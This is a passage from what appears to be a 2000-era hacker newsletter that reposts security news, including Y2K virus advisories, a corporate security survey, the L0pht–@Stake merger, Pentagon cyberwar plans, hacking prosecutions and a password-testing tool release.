Nikkei Internet Technology conducted a survey in October and November on Japanese companies to ascertain what kind of Internet technologies and systems they seek to put in place and what kind of measures they are taking to counter computer viruses and cases of unauthorized access. The following is a brief overview of the survey results.

The respondents of the survey are companies listed on the first and second sections of the Tokyo Stock Exchange, the Osaka Securities Exchange and the Nagoya Stock Exchange, which have their own home pages, as well as unlisted companies with sales of at least 30 billion yen a year. (102.90 yen = US$1)

Nikkei Internet Technology sent questionnaires to more than 2,600 companies and about 900 of them responded to the questionnaire.

The findings indicate that about 80 percent of the respondents said they had introduced the Internet prior to 1997. However, their access environment is not on a satisfactory level yet, as the Internet-access speed for about 95 percent of them was 1.5Mbps or slower.

Nikkei Internet Technology was surprised to learn the survey results on corporate experiences in the area of computer viruses. The survey discovered that 90 percent of the respondents said they have been infected with viruses.

In fact, the editorial department of Nikkei Internet Technology also discovered its system was infected with computer viruses a few times in the past several months. In one case, our computers were infected with a virus through a news release in the form of an attached file on Microsoft Word software.
All of our staffers use antivirus software and update a pattern file of the software regularly so that the software can handle any new types of virus. We can see the importance of taking regular measures to prevent virus infections.

According to the survey findings, 66 percent of the companies said all of their employees use antivirus software and 94 percent of them said some of their employees do so. We believe that there will be a growing need to introduce such prevention measures against computer viruses.

Meanwhile, only about 20 percent of the respondents said they have had unauthorized access from outside. Although we have not analyzed the results in detail yet, we found that a few companies have actually suffered damage resulting from intrusions. Some firms have reported that they had their ports scanned by someone. It is obvious that Japanese companies need to address issues of unauthorized access.

Slightly fewer than 25 percent of the companies said they have already introduced a tool that detects vulnerable areas in system security, the survey finds. However, more than 40 percent of them said they do not plan to introduce such a tool or they don't know if they will do so soon.

We found that it will be inevitable for these companies to introduce such new systems as Internet VPN, encryption mail and Single Sign-on and to adopt preventive measures against computer viruses and cracking.

(Norio Inaba, Editor-in-Chief, Nikkei Internet Technology)

@HWA

62.0 Virus FUD Continues 01/05/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

After forecasting 30,000 new viruses to attack on January 1, the mainstream media seems to be still playing up the Virus angle. Basically they all say that 'No viruses for Y2K, but they might still arrive.' The FUD factor in some of these articles is amazing. Yes, Viruses are a threat, but they are no more a threat today than they were last week.

The Straits Times - No virus attacks on computers on Jan 1
http://www.straitstimes.asia1.com/cyb/cyb1_0105.html

Yahoo News - Trend Micro Discovers 14 New Viruses
http://biz.yahoo.com/bw/000103/ca_trend_m_1.html

Sydney Morning Herald - Bug-free so far, but virus may lurk
http://biz.yahoo.com/bw/000103/ca_trend_m_1.html

Australian Financial Review - New computer viruses crop up with year 2000
http://www.afr.com.au:80/content/000104/update/update44.html

Excite News - NAI Recommends Continued Caution
http://news.excite.com:80/news/pr/000103/ca-network-assoc-y2k

Straits Times; 404

Yahoo News;

Monday January 3, 8:04 am Eastern Time
Company Press Release

Trend Micro Discovers 14 New Viruses/Worms During Y2K Rollover
Provides Monday Morning Tips for Computer Users

Trend Micro Recommends Monday Morning Precautionary Measures to Help Computer Users Minimize Risk of Virus Outbreaks

CUPERTINO, Calif.--(BUSINESS WIRE)--Jan. 3, 2000-- Trend Micro Inc. (Nasdaq:TMIC - news; Japan OTC:4704), a leading provider of Internet virus protection, today announced discovery of fourteen (14) new viruses over the Millennium weekend by its special Y2K virus watch eDoctor(TM) engineers, who have been working 24x7 since December 15th in anticipation of increased virus activity leading up to Y2K. Four (4) of these new viruses had Y2K-associated trigger dates or messages associated with them. During this same time period, six (6) viruses were detected at customer sites in North America.

Trend Micro has updated its virus definition files to defend against all fourteen of these newest computer virus threats and advises computer users to update their virus protection software first thing Monday morning to ensure protection and to use extra caution when opening email attachments. At the time of writing, these viruses are not considered a serious threat.

During the past seven days, Trend Micro's World Virus Tracking Center recorded more than 4,000 infected computer systems worldwide.
The World Virus Tracking Center at http://wtc.trendmicro.com/wtc/, monitors in real time the activity and travel patterns of viruses worldwide. Figures are based on the scanning results of users worldwide who surf to Trend Micro's web site and use its free on-line virus scanning tool, HouseCall(TM), to scan and rid their computers of viruses.

Viruses discovered at customer sites from December 31 to January 2 include:

-- W97M_Chantal.B -- (Y2K VIRUS) a destructive Word 97 macro virus that infects documents and templates and also tries to delete all files in c:\ drive. Similar to W97M_Chantal.A, W97M_Chantal.B has the same payload, which triggers on the 31st day of the month and displays a message box with the following content: "Y2K is Coming Soon..." .

-- VBS_LUCKY2000 -- (Y2K VIRUS) an overwrite-type worm that is written in Visual Basic Script. Once executed it overwrites files in the same directory with itself and makes them 866 bytes in size. Then it creates a shortcut on the desktop, which points to a web site in Russia. Once the URL is created, it tries to connect to that web site using the default browser.

-- TROJ_WINKILL (a.k.a. Trojan.KillInst98, Inst98, Trojan/Kill_Inst98) -- a DOS Trojan is a compressed file that upon execution if certain conditions are met will delete all files in the c:\ directory. When the Trojan is run it executes a command that turns off the confirmation and the output is not seen by the user. As a result, the user is not able to notice that the files have been deleted.

-- PE_CRYPTO -- a memory resident PE-file infector that tries to hide its presence by using an encryption mechanism. This virus also deletes antivirus related files to avoid detection. Upon execution, PE_CRYPTO drops kernel32.dll and wininit.ini files. Upon boot up, the original kernel32.dll is replaced by the one dropped by the virus. After that the virus tries to infect other files, also adding encryption to all newly infected files.
Since the dll file is loaded upon restart, the virus becomes memory resident and is executed each time the computer is rebooted.

-- VBS_BUBBLEBOY (a.k.a. BUBBLEBOY WORM) -- attained much notoriety in the press because it is the first virus discovered that doesn't require the user to click on an attachment in order to activate. BubbleBoy arrives in an email with a Subject line that reads "BubbleBoy is back!" The message contains an invalid URL ending in "bblboy.htm" and the message text "The BubbleBoy Incident, pictures and sounds." When executed, the worm will try to email itself to every contact in the user's address book. It also goes into the registry and changes the system's registered owner to "BubbleBoy" and the organization to "Vandelay Industries."

Y2K viruses discovered from December 31 to January 2 include:

-- TROJ_ZELU -- a trojan pretending to be a Y2K checking software (Y2K.EXE), TROJ_ZELU that in fact, does not fix any Y2K bugs. Instead, it goes through all drives and deletes files. As it does so, it displays the following text: "This file is sick ! It was contaminated by the radiation liberated by the explosion of the atomic bomb." TROJ_ZELU does not infect other files and it does not reside in memory. This trojan is not in the wild at present and has not been spotted at any customer sites.

-- W97M_VALE.A -- a macro virus that can infect all Windows platforms. This virus does not have a dangerous payload and is currently not in the wild. Once a system is infected, W97M_VALE.A uses IRC servers to send an infected file to chat users. This virus also has various trigger dates (May 19, Sept. 20, Dec. 25, Jan. 1) and displays different messages on different dates. It also hooks various macro functions to drop files called MONEY.DOC and DINHEIRO.DOC to the c:\Windows directory, displays messages in the Office Assistant, and modifies the registry to reduce Office 2000's security level.
The virus author intended to have W97M_VALE.A spread via Outlook, but this payload does not work.

-- W97M_Chantal.B -- (described above)

-- VBS_LUCKY2000 -- (described above)

Monday morning steps to take to minimize risk of infection:

Trend Micro urges all computer users to take the following precautionary measures when booting up their computers on Monday morning to minimize risk of virus infection.

-- Update virus protection software -- Before opening any documents or checking email, users should be sure to update their virus protection software to ensure protection against viruses discovered during the Y2K rollover. Trend Micro customers should update to Pattern File 637, which includes protection against all of the 14 new viruses.

-- Avoid opening any suspicious or unexpected email attachments -- Don't take unnecessary chances by opening email attachments sent by individuals you don't know, or by opening email attachments from users you do know that you were not expecting. If you have a suspicious file or think you might have a virus, email it to virus_doctor@trendmicro.com for our team of virus doctors to review. This is a free service provided by Trend Micro.

-- Save all email attachments to a local drive before opening -- Desktop virus protection does not scan email attachments if they aren't first saved to a local drive. Ensure all email attachments are scanned by virus protection software by saving them to local drive before opening them.

-- Use free online virus scanners -- If you haven't invested in desktop virus protection, use a free online virus scanner, like Trend Micro's HouseCall at http://housecall.antivirus.com, to scan and rid your computer of viruses. Remember, online scanners can't protect you from viruses lurking in unopened email attachments. They can only scan files already on your system.
If you are relying on an online scanner, save all email attachments to a local drive before opening them and then use HouseCall to scan them all at once.

-- Set Browser and Windows Security Settings to Medium or High -- This will prevent certain script viruses from automatically executing. To set security to high, go to Tools/ Internet Options. Click the security tab and select high security.

Trend also strongly advises that users get the latest security patches from Microsoft. Users with Microsoft's Internet Explorer 5.0 can go to Tools/ Windows Update to get the latest patches and plug-ins.

More information about all of these viruses and worms can be obtained from Trend Micro's special Y2K Virus Watch site, http://www.y2kvirus.com.

About Trend Micro

Trend Micro provides centrally controlled server-based virus protection and content-filtering products and services. By protecting information that flows through Internet gateways, email servers, and file servers, Trend Micro allows companies and managed service providers worldwide to stop viruses and other malicious code from a central point before they ever reach the desktop.

Trend Micro's corporate headquarters is located in Tokyo, Japan, with business units in North and South America, Europe, Asia, and Australia. Trend Micro's North American headquarters is located in Cupertino, CA. Trend Micro's products are sold directly and through a network of corporate, value-added resellers and managed service providers. Evaluation copies of all of Trend Micro's products may be downloaded from its award-winning web site, http://www.antivirus.com.

Note to Editors: eDoctor and HouseCall are trademarks of Trend Micro Incorporated. Other product and company names may be trademarks of their respective owners.

Contact:

Trend Micro Inc.
Susan Orbuch, 408/257-1500 Ext. 6362
susan_orbuch@trendmicro.com
or
Asia:
Kristin Zoega, +886-2-2378-9666 Ext. 418
kristin_zoega@trend.com.tw
or
Europe:
Donna Rennemo, +47 22 86 24 43
donna_rennemo@trendmicro.com

-=-

Australian Financial Review;

New computer viruses crop up with year 2000

Several new computer viruses appeared during the last days of 1999 and the first weekend of 2000, anti-virus software makers said today.

The software maker Trend Micro detected 14 viruses, four of which were triggered with the passage to the year 2000 (Y2K) or post messages tied to this changeover.

Six of the viruses were discovered by business clients in North America, the firm said.

The viruses pose no serious threat for the moment, Trend Micro said, adding however that some 4,000 computer systems have been affected worldwide in the past seven days.

Jeffrey Carpenter, from Computer Emergency Response Team's virus surveillance centre at Carnegie Mellon University, said the volume of viral incidents tied to Y2K have been near that found on an average day - 30.

Among the new viruses, "Feliz.Trojan" from Portugal can destroy several operating files on a computer hard drive, leaving the machine inoperable. However, unlike other viruses, this one cannot multiply, software maker Computer Associates said.

Once the files are destroyed, an image pops on the screen with the message "Feliz ano novo" or "Happy New Year" in Portuguese.

When the computer user clicks on the "exit" icon, a series of messages appear in Portuguese and the command is executed, leaving the computer unable to boot up again, Computer Associates, which makes an anti-virus program, said.

Another virus, Troj.Zelu, claims to fix Y2K problems but can actually destroy all files on an infected machine, the firm said.

And Lucky2000 virus replaces all the files with its own code and carries a link to a Web site in Russia.

Trend Micro said the Chantal.B virus, which is activated the 31st day of every month, also can destroy all hard drive files. It posts the message "Y2K is coming soon ..."

Other viruses are spreading by the traditional e-mail path.

In Finland, mobile phone giant Nokia said it closed its internal e-mail system to prevent further damage from the "ExploreZip worm virus" which had infected computer systems of several large international companies, the Helsinki business paper Taloussanomat reported Monday.

A spokeswoman said they believe the virus caused little damage. It entered their systems on Wednesday and was stopped on Thursday.

Another e-mail virus, "Armagidon," will replace the computer's cursor with another symbol.

AFP

Excite News;

Network Associates Recommends Continued Caution as Corporations Return to Work After Quiet Y2K Weekend

Continued Vigilance Necessary Even After Uneventful New Year's Holiday As Potential Viruses May Be Lurking in Email for Returning Employees

Updated 6:00 AM ET January 3, 2000

SANTA CLARA, Calif., Jan. 3 /PRNewswire/ -- Network Associates, Inc. (NASDAQ:NETA) today reminded companies and consumers of the need for continuing "safe computing" practices as they return to work after the New Year's holiday. Recognizing that the limited virus threat throughout the holiday may result in a feeling of false security, Network Associates reminds IT Managers that the potential for damage from new viruses or security holes still exists. Network Associates' McAfee AVERT (Anti-Virus Emergency Response Team) will remain in high alert posture for the next 72 hours, as the majority of computers worldwide are powered up for the first time this millennium on the morning of January 3.

"We are pleased that the New Year's holiday did not pose any strong threats to our customers, as the potential for Y2K damage was very real," said Sal Viveros, director for McAfee Total Virus Defense at Network Associates. "However it is essential for corporations to stay on top of virus happenings and be especially alert this week as computers are re-booted, and email between users and the outside world begins to flow freely again."

"Melissa was one of the most destructive viruses of 1999. This virus spread at lightning speed through email attachments. It was discovered on a Friday morning, and had spread world-wide within six hours," said Jimmy Kuo, director of AVERT anti-virus research. "Because these viruses can strike at any time, and the threat continues, this week AVERT will staff the CyberAssurance National Information Center, which is part of the President's Council on the Year 2000 Conversion Information Coordination Center."

From December 30 through the turnover to the new year, McAfee AVERT researchers found seven low-risk viruses, which represents the average amount of virus writing activity AVERT usually experiences during a four-day timeframe. There has been no indication that these seven viruses are actively spreading in customer sites at this time. Nevertheless, AVERT's worldwide research and support team will continue to monitor for the spread of these viruses as well as any new viruses released during the New Year. For details on the seven new viruses as well as continued updated information on newly discovered Y2K viruses, visit the AVERT Web site at: http://vil.nai.com/villib/alpha.asp.

Network Associates is recommending continued caution during the week of January 3, 2000, suggesting that users adhere to the following guidelines to protect against viruses.

1. Be wary of emails from unfamiliar senders.
2. Don't double-click on email attachments -- save and scan them first
3. Keep software updated.
4. Turn on Macro Virus Protection.
5. Be cautious with free downloads.
6. Guard your personal and financial information.
7. Protect your personal computer.
8. Protect your passwords.
9. Teach children online safety tips.
10. Protect online transactions by using a secure browser.
11. Bonus tip: Be careful -- but don't believe everything you hear.

The McAfee Total Virus Defense suite provides comprehensive anti-virus protection at the desktop, file server, groupware server and Internet gateway. Powerful integrated management tools make it easy for administrators to deploy updates and upgrades, and to configure and monitor virus security enterprise-wide. The McAfee Total Virus Defense product line is sold as a standalone suite and as part of the Net Tools Secure suite, Network Associates' comprehensive security suite incorporating anti-virus, firewall, encryption, authentication, intrusion detection, vulnerability assessment, and security management.

Network Associates' McAfee AVERT (Anti-Virus Emergency Response Team), a division of NAI Labs, is the largest network of virus researchers in the industry. During the week of January 3, AVERT will continue to work 24X7 around the globe to provide the latest in virus research and anti-virus solutions.

With headquarters in Santa Clara, Calif., Network Associates, Inc. is a leading supplier of enterprise network security and management software. Network Associates' Net Tools Secure and Net Tools Manager offer best-of-breed, suite-based network security and management solutions. Net Tools Secure and Net Tools Manager suites combine to create the Net Tools solution, which centralizes these point solutions within an easy-to-use, integrated systems management environment. For more information, Network Associates can be reached at 972-308-9960 or on the Internet at http://www.nai.com.

NOTE: Network Associates, McAfee, Total Virus Defense, VirusScan and Net Tools are registered trademarks of Network Associates, Inc. and/or its affiliates in the United States and/or other countries. All other registered and unregistered trademarks in this document are the sole property of their respective owners.

@HWA

63.0 L0pht Merges With @Stake, Receives Funding 01/06/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Mudge

The renowned hacker think tank L0pht Heavy Industries has merged with the newly formed internet security services company @Stake, Inc. @Stake has assembled a diverse team of extreme talent from premier organizations including Forrester Research, the L0pht, Cambridge Technology Partners, and Compaq Computer. Mudge, from the L0pht, has said that @Stake's vendor neutrality, combined with open lines of communication allows the L0pht to remain true to their roots which is focused on security research and execution which shatters industry myths and builds a totally new standard. @Stake executives will be participating in the major security trade show, RSA 2000, scheduled for January 16-20 in San Jose.

Press Release
http://www.hackernews.com/press/l0phtmerg.html

@Stake Inc.
Http://www.atstake.com

L0pht Heavy Industries
http://www.l0pht.com/

Boston Globe
http://www.boston.com/dailyglobe2/006/business/Computer_security_firm_born_from_alliance+.shtml

Associated Press - via San Jose Mercury News
http://www.sjmercury.com/svtech/news/breaking/ap/docs/61092l.htm

Reuters - via Excite
http://news.excite.com/news/r/000106/00/net-atstake-security

MSNBC
http://www.msnbc.com/news/353999.asp

Press release:

Top Executives from Forrester Research, Cambridge Technology Partners, and Compaq Establish @Stake; Specialized Internet Security Services Firm

The L0pht, renowned 'hacker think-tank,' to join @Stake

Receives $10 million in Initial Backing from Battery Ventures

Cambridge, Mass., January 6, 2000 - A group of top Internet executives announced today the establishment of @Stake Inc., a specialized professional services firm that will provide a full range of security solutions for the e-commerce operations of global clients. @Stake represents the industry's only independent security services provider.

@Stake also announced that renowned hacker think-tank the L0pht has merged with the newly formed company. This strategic move reflects the firm's commitment to build a world-class team of professionals offering non-traditional, e-commerce-age security solutions for clients.

In addition, the company disclosed that it has received over $10 million in initial funding from Battery Ventures, a leading high tech venture capital firm whose other investments include Akamai Technologies, InfoSeek, and Qtera. @Stake is the first company spawned from Battery's newly created in-house incubator program.

"@Stake's independence and dedicated focus on Internet security differentiate their approach from other providers," according to Tom Crotty, general partner at Battery Ventures. "They have assembled a diverse team of extreme talent from premier organizations including Forrester Research, the L0pht, Cambridge Technology Partners, and Compaq Computer."

The company will offer a full range of security services enabling e-commerce for Global 2000 clients. @Stake will focus on planning next-generation security platforms that achieve long-term e-commerce objectives as well as securing clients' immediate Internet needs. Key to the company's strategic approach is building comprehensive security architectures to minimize the impact of viruses, malicious attacks and other threats while maximizing opportunity and competitiveness for firms engaged in the Internet economy.

The company's professional services span infrastructure security, including VPNs and firewalls; content security, such as anti-virus and e-mail scanning; application security, including fine-grained application access control; and operations security, such as intrusion detection and scanning systems.

@Stake's management team includes:

* Dr. Daniel Geer, Chief Technology Officer, formerly vice president and senior strategist at CertCo and director of engineering at Open Market.
His tenure as manager of systems development at MIT's Project Athena led to the creation of, amongst other innovations, the X Window System and Kerberos.

* Ted Julian, VP of Marketing and Business Development, formerly lead security analyst at Forrester Research and known for the far-reaching impact of his reports, "Security Suites: Dead on Arrival" and "Turning Security on Its Head."

* Mudge, VP of Research and Development, served as CEO/Chief Scientist of hacker think-tank, the L0pht. Having appeared before the Committee on Governmental Affairs of the US Senate to discuss vulnerabilities facing technological resources, Mudge led the L0pht, a group of 'grey-hat hackers' known for unorthodox, extreme technical sophistication.

* Dr. Phil Tams, VP of Consulting and Operations, formerly a senior manager at Cambridge Technology Partners and responsible for restructuring IT systems and businesses to compete effectively in the Internet economy.

* John J. Rando, Chairman of the Board, was previously senior vice president and group general manager at Compaq. He is widely known for his work developing software product services, pioneering new delivery methodologies, and lifecycle service solutions in networking and systems integration.

"@Stake helps clients address the most critical issue facing their e-commerce initiatives: maintaining the highest levels of security while maximizing openness," said Ted Julian, Founder and VP of Marketing and Business Development. "Our strategic approach is based on the premise that true security lies in enabling the entire enterprise, rather than locking down the system with unnecessary complexity and control."

"By enabling Internet objectives, our security services unleash enormous benefits for organizations building their e-commerce operations," continued Julian.

According to IDC Research, the demand for network security consulting and management services will reach over $1.6 billion in 2002.
In addition, in its November 29 brief, "exSourced Security Arrives," Forrester Research "recommends the majority of businesses meet their security needs with exSourcers ... third-party security service providers that connect external constituents with internal processes."

"The opportunity to join the first and only independent 'pure play' in the field of Internet security consulting is perfect for the L0pht," according to Mudge, now @Stake's VP of R&D. "@Stake's vendor neutrality, combined with open lines of communication to the full spectrum of people dealing with online security, allows us to remain true to our roots - security research and execution which shatters industry myths and builds a totally new standard."

@Stake executives will be participating in the major security trade show, RSA 2000, scheduled for January 16-20 in San Jose.

With headquarters in Cambridge, Mass, @Stake is a specialized professional services firm providing security solutions for the e-commerce operations of global clients. More information can be found at www.atstake.com

@Stake, Inc. -- Securing the Internet Economy(sm).

-=-

@HWA

64.0 Offensive Cyberwar Capabilities Taking Shape 01/06/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by betty

Air Force Gen. Richard Myers told a Pentagon briefing that he thinks cyberwarfare should take its place alongside bombs, cruise missiles and attack helicopters. Myers currently commands Colorado based U.S. Space Command, which is responsible for the cyber defense of DoD systems. Later this year the computer network attack research team will formally take shape at Space Command Headquarters at Peterson Air Force Base. (Space Command? Sounds like something out of a science fiction novel.)

Reuters - via MSNBC
http://www.msnbc.com/news/353982.asp

Wired
http://www.wired.com/news/politics/0,1283,33443,00.html

General Richard B. Myers.

U.S. plots cyberwarfare strategy

Pentagon officials say they intend to target foes’ computers

REUTERS

WASHINGTON, Jan. 5 — The Pentagon plans to make cyber blitzes on a foe’s computer networks a standard war tactic, the incoming number two U.S. military officer said Wednesday.

AFTER POLICY and legal issues are sorted out, cyber tactics should take their place in every commander’s arsenal alongside bombs, cruise missiles and attack helicopters, Air Force Gen. Richard Myers told a Pentagon briefing.

“I think it’s just going to be one more arrow in the quiver,” said Myers, who takes over as vice chairman of the Joint Chiefs of Staff on March 1.

The formal establishment of a cyberwar-fighting doctrine will build on covert military and intelligence capabilities that have been scattered in “black” programs in the past.

‘A VERY ELEGANT WAY’

Myers said such “keystroke” attacks would have the advantage of limiting both U.S. casualties and spillover harm to a target nation’s population.

“If you can degrade an air defense network of an adversary through manipulating ones and zeros, that might be a very elegant way to do it as opposed to dropping 2,000-pound bombs on radars,” he said. “These are tools that need to go to the operational and tactical levels.”

Currently, each of the U.S. armed services has a covert cyber attack capability of its own, said Myers. “I think it’s fair to say that we have done this in the past on a case-by-case basis.”

He cited the conflict in Kosovo last year, after which Gen. Henry Shelton, chairman of the Joint Chiefs, said the United States had mounted electronic attacks into Serbian networks during a NATO air campaign.

“We worked through some policy and legal issues during Kosovo that will hopefully help us in the future,” Myers said.
But he said Serbia offered “limited opportunities” because the Serbs were “not relying on systems that were heavily involved with information technology.”

Myers said other countries considered cyber attack as a way of neutralizing nations like the United States which had overwhelming advantages in conventional forces.

TEAM TAKING SHAPE

The Colorado Springs, Colo.-based U.S. Space Command, which is headed by Myers, assumed responsibility on Oct. 1 for defending Defense Department computer networks from hacker or foreign attack.

Next October 1, a companion “computer network attack” research team will formally take shape at Peterson Air Force Base, headquarters of the Space Command. Its first job will be to piece together covertly developed U.S. cyber weapons currently scattered among intelligence and military units.

Among the thorny policy issues is the potential blurring of the line between military and civilian targets. Myers cited the case of knocking out a communications network handling civilian applications as well as a nation’s air defense.

“I think it’s going to be the legal advisers and the war fighters thinking our way through this,” he said. “And it’s just something we haven’t spent an awful lot of time doing, and we just need to do that.”

Critics have warned that the United States is opening a Pandora’s box in moving to integrate “information warfare” tools into military doctrine.

“Those same tools would likely be a bigger threat to our systems than to those of any potential opponent,” said Kawika Dagui of the Financial Information Protection Center, a Washington-based industry trade group.

-=-

Wired;

A'Hacking the Military Will Go
by Declan McCullagh

12:30 p.m. 5.Jan.2000 PST

WASHINGTON -- In a move to enlist hackers as part of the nation's defense, the US military is drafting a plan to penetrate and disrupt the computers of enemy nations, officials said Wednesday.

"If you can degrade the air defense network of an adversary through manipulating 1s and 0s, that might be an elegant way to do it," said General Richard Myers of the US Space Command, which is coordinating the effort.

Myers told reporters that Pentagon planners are currently devising general hacker-war procedures, which must be approved by the Secretary of Defense and should be complete by October.

In October 1999, the Space Command took over the job of protecting Defense Department computers from hacker attacks.

But its new roles raise some knotty questions. For instance, should the military be involved in defending vital military communications when they travel over commercial networks? Should online attacks on an enemy's infrastructure be viewed as an act of war, and should such attacks be approved by the president, Congress, or the Pentagon?

Myers admitted the answers are still unknown. "A very big part of what we do is to work through the policy and legal parts."

One option -- in a kind of unilateral arms-control agreement -- is for the US to pledge not to launch electronic attacks in hopes that international law will follow. It seems to be what China -- which last year asked the UN General Assembly to investigate the issue -- and Russia both want.

But for now, the Pentagon is readying its platoons of hackers.

"The services are trying to attract the best and the brightest to come into this area," Myers said. "We think we can do that because we are going to be working on leading-edge technology, we'll give them the right tools, and they'll be doing something for their country."

The Pentagon's announcement, which has been quietly discussed for nearly a year, comes at a time when military worries about hackers are at an all-time high. Officials had fretted that attacks would increase on Y2K eve, though government sources say only one minor incident took place.
A September 1999 report prepared by congressional auditors claimed there were "serious weaknesses" in the Defense Department's information security. Military networks reportedly experienced over 18,500 intrusions last year, compared to 5,844 in 1998, though some critics have questioned the methodology used to determine those figures. Back in 1997, a war-game exercise named Eligible Receiver reportedly showed that enemy hackers -- in this case, ones playing the part from the National Security Agency -- could bring down 911 phone service and power grids in some cities. The military's NIPRNET (Non-classified Internet Protocol Router Network) carries non-secret information, while the SIPRNET (Secret Internet Protocol Router Network) handles more sensitive data.

@HWA

65.0 Army Criticized By Judge On Lack of Security 01/06/00
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Ted

U.S. District Judge J.P. Stadtmueller has criticized the U.S. Army's efforts to keep its public Web site secure. The Judge said the Army's effort, or lack of it, could affect the amount of restitution Mindphaser (Chad Davis) is ordered to pay. Mindphaser has pleaded guilty to defacing the server last June 28th. Stadtmueller asked Assistant U.S. Attorney Eric Klumb to get more information on the matter before Mindphaser's scheduled sentencing hearing in March. (Wonder if he will mention that the Army was warned about the problem with their server weeks in advance?)

Associated Press - via San Jose Mercury News
http://www.sjmercury.com/svtech/news/breaking/ap/docs/58972l.htm

HNN Archive of US Army Defacement
http://www.hackernews.com/defaced/1999/army/index.html

Posted at 12:26 p.m. PST Wednesday, January 5, 2000

Judge critical of Army Web site

MILWAUKEE (AP) -- A federal judge criticized the U.S. Army's efforts to keep its public World Wide Web site secure after a 20-year-old man said it was easy to hack into it.
``The Army didn't do its homework in the first instance,'' U.S. District Judge J.P. Stadtmueller said Tuesday. The judge commented as Chad D. Davis pleaded guilty Tuesday to gaining unauthorized access to the site and altering its contents. Davis said he had hacked into the Army computer using information freely available on the Internet. He replaced the Army's opening Web page with the ``signature page'' of Global Hell, a nationwide group of hackers to which he belonged. Stadtmueller said the Army's effort, or lack of it, to keep its Web site secure could affect the amount of restitution Davis is ordered to pay. The judge directed Assistant U.S. Attorney Eric Klumb to get more information on the matter by the time Davis is sentenced in March. Davis exploited a security flaw in a computer program used in building the Web site, according to federal court documents in the case. Klumb said the Army had installed a ``patch'' for the shortcoming before Davis broke in. But there was a period during the summer when the Web site was being moved from one server to another when the patch was not installed on the new server, Klumb said, allowing Davis to break in. Pentagon spokeswoman Nancy Ray said Wednesday that hacking is electronic vandalism. ``It's against the law. That's why the person was in court,'' Ray said.

@HWA

66.0 FAA Responds to Allegations 01/06/00
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

The Federal Aviation Administration has said that even though they hired foreign nationals to fix their Y2K computer problems that their systems were not compromised as charged by the General Accounting Office. The GAO report released Jan. 4 said that the FAA had not consistently required appropriate background checks on contractor employees who reviewed and fixed air traffic control software for Y2K compliance.
The FAA says that although foreign nationals may have been used no back doors were inserted into the code.

Federal Computer Week
http://www.fcw.com:80/pubs/fcw/2000/0103/web-faa-01-05-00.html
(Sorry, page returned a 404 - Ed)

@HWA

67.0 Electronic Intruder released with Fine and No Jail 01/06/00
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by no0ne

Peng Yuan Han, now 18, will not be spending any time in jail for electronically breaking into the computer systems of Singapore's National Computer Board (NCB), Ministry of Education (MOE) and Nanyang Technological University (NTU). Instead he was fined SG$8,000 because he was a teenager when the crimes were committed in 1997.

The Straits Times
http://straitstimes.asia1.com/cyb/cyb3_0106.html
(Sorry, page also returned a 404 - Ed)

@HWA

68.0 PalmCrack 1.0 Released 01/06/00
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by kingpin

NonCon, Inc., has released PalmCrack 1.0 which is capable of checking UNIX and NT passwords against a dictionary and decrypting certain Cisco router passwords. The release of this software was delayed until after Jan 1, 2000 in accordance with President Clinton's request.

Noncon
http://www.noncon.org/

Press release:

Noncon Releases PalmCrack®, the Password Testing Tool for the Palm Computing Platform®

Internet - January 5, 2000 - Noncon has released PalmCrack, the password testing tool for the Palm Computing Platform. Designed to help security professionals determine the strength of passwords, PalmCrack is able to check UNIX and NT passwords against a dictionary and decrypt certain Cisco router passwords. PalmCrack runs on PalmOS 2 and PalmOS 3 devices, including the PalmPilot Professional through the PalmVII and the IBM WorkPad series. It requires 31KB to 1MB of memory depending on the size of the dictionary installed.

About Noncon

Noncon is a group of rebel non conformists formed in 1982.
Their goal is to provide non conforming solutions to the public. For more information, check out the Noncon web site at http://www.noncon.org/.

Note: In accordance with President Clinton's request, the release of this tool was delayed until after January 1, 2000.

@HWA

69.0 Radio Pirates (criminals) Steal Police Airwaves 01/06/00
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

HWA Comment: These aren't pirates, they are just kids with some radios and no skill being vandals and disrupting emergency services, the type you find buying 2m ht's and spewing QRM over legit ham airwaves, they should be hunted down with RDF gear and have the book thrown at them, there is nothing skillful or 'elite' in disrupting legit radio services! anyone with minimal knowledge can purchase and modify standard 2meter band ham radios to broadcast over emerg. freqs. and some radios have such extended coverage built in, these are just vandals akin to the lewsers that tie up 911 services with bogus calls for kicks, the killer in all this is that these people will most likely be caught as the technology for tracking such abuse is quite sophisticated similar to cell tracking. - Ed (licensed ham operator)

From HNN http://www.hackernews.com/

contributed by mphantasm

Police departments in San Francisco, Berkeley, Richmond, and Albany have reported intruders on their communications systems. Screaming obscenities and making false emergency calls over reserved police radio frequencies are just some of the issues involved.

APB News
http://www.apbnews.com/cjprofessionals/behindthebadge/2000/01/05/copradio0105_01.html

Radio Pirate Invades Police Frequencies
Broadcasts False Reports in San Francisco Area

Jan. 5, 2000
By Robert Wang

BERKELEY, Calif. (APBnews.com) -- Several police departments in the San Francisco Bay area are searching for a radio-frequency pirate who has invaded the police radio bands, transmitting bogus crime reports and profanity-laced tirades.
